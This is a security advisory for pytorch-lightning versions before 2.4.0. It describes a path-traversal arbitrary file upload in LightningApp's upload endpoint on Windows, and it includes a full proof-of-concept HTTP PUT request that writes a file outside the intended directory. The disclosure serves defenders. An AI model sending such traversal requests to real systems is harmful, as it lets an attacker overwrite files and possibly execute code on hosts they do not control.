Arbitrary File Upload Affecting pytorch-lightning package, versions [,2.4.0)

pytorch-lightning is a lightweight PyTorch wrapper for ML researchers. Scale your models. Write less boilerplate.

Affected versions of this package are vulnerable to Arbitrary File Upload via the LightningApp when running on a Windows host at the /api/v1/upload_file/ endpoint. An attacker can write or overwrite arbitrary files by providing a crafted filename, potentially leading to remote code execution by overwriting critical files or placing malicious files in sensitive locations.

PUT /api/v1/upload_file/..\..\..\..\Desktop\hacked.txt HTTP/1.1
Host: localhost:7501
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------23233018371240449754774180329
Content-Length: 256
Origin: http://127.0.0.1:5500
Connection: close
Referer: http://127.0.0.1:5500/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Priority: u=1

-----------------------------23233018371240449754774180329
Content-Disposition: form-data; name="uploaded_file"; filename="123.txt"
Content-Type: text/plain

hackeddddddddddddddd
-----------------------------23233018371240449754774180329--

• GitHub Commit